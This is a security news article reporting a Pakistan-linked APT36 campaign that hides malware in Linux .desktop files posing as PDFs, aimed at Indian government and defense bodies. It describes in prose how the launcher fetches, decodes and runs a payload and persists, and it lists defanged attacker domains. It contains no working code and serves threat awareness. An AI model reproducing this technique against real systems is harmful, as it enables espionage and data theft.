APT36 uses Linux .desktop files in new attacks on Indian gov & defense, aiming for data theft and persistent espionage access.
Transparent Tribe (aka APT36, Operation C-Major, and Mythic Leopard), a Pakistan-linked threat actor, is using Linux .desktop files to load malware in new attacks against government and defense entities in India.
The APT group is targeting Indian government entities via spear-phishing emails deploying custom malware for persistent espionage.
APT36’s latest campaign uses a malicious archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip” containing a disguised .desktop file flagged on VirusTotal.
The shortcut masquerades as a PDF but executes hidden commands via Bash. The “.desktop” file mimics a PDF but hides malicious commands in its Exec= line. It downloads a hex-encoded payload from securestore[.]cv, decodes and executes it silently, while showing a benign PDF in Firefox as a decoy. Disguised with a PDF icon, set to run as an application, and enabled for autostart, it ensures persistence and stealth, letting malware operate unnoticed.
The campaign was uncovered on August 1, 2025, and is still ongoing.
The analyzed file is a suspicious 64-bit ELF executable for x86-64, statically linked, with anomalies like a huge section header offset, missing section names, and irregular segments typical of malware packing. It embeds the hardcoded C2 “modgovindia[.]space:4000” and ensures persistence via cron jobs and systemd service abuse. On execution, it connects to the C2, using DNS queries and UDP sockets for stealthy communication, enabling data exfiltration and attacker control.
The Operation Transparent Tribe (Operation C-Major, APT36, and Mythic Leopard) was first spotted by Proofpoint Researchers in Feb 2016, in a series of cyber espionage operations against Indian diplomats and military personnel in some embassies in Saudi Arabia and Kazakhstan. At that time, the researchers tracked the sources IP in Pakistan, the attacks were part of a wider operation that relies on multi-vector such as watering hole websites and phishing email campaigns delivering custom RATs dubbed Crimson and Peppy. These RATs are capable of exfiltrate information, take screenshot, and record webcam streams.
Transparent Tribe has been active since at least 2013, it targeted entities across 27 countries, most of them in Afghanistan, Germany, India, Iran, and Pakistan.
Transparent Tribe (APT36) was first spotted in 2016 targeting Indian diplomats and military staff via phishing and watering hole attacks. Linked to Pakistan, it used custom RATs like Crimson and Peppy to exfiltrate data, capture screenshots, and record webcams. The group has targeted entities in 27 countries, mainly India, Afghanistan, Germany, Iran, and Pakistan.
“While Indian government entities remain the primary focus, APT36 has extended operations to adjacent sectors (education, research, and civil society), as well as opportunistic targeting in other geographies. This broad victimology increases the attack surface and introduces risk to partners, suppliers, and diplomatic missions abroad.” concludes the report published by CYFIRMA. “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
Pierluigi Paganini
(SecurityAffairs – hacking, APT36)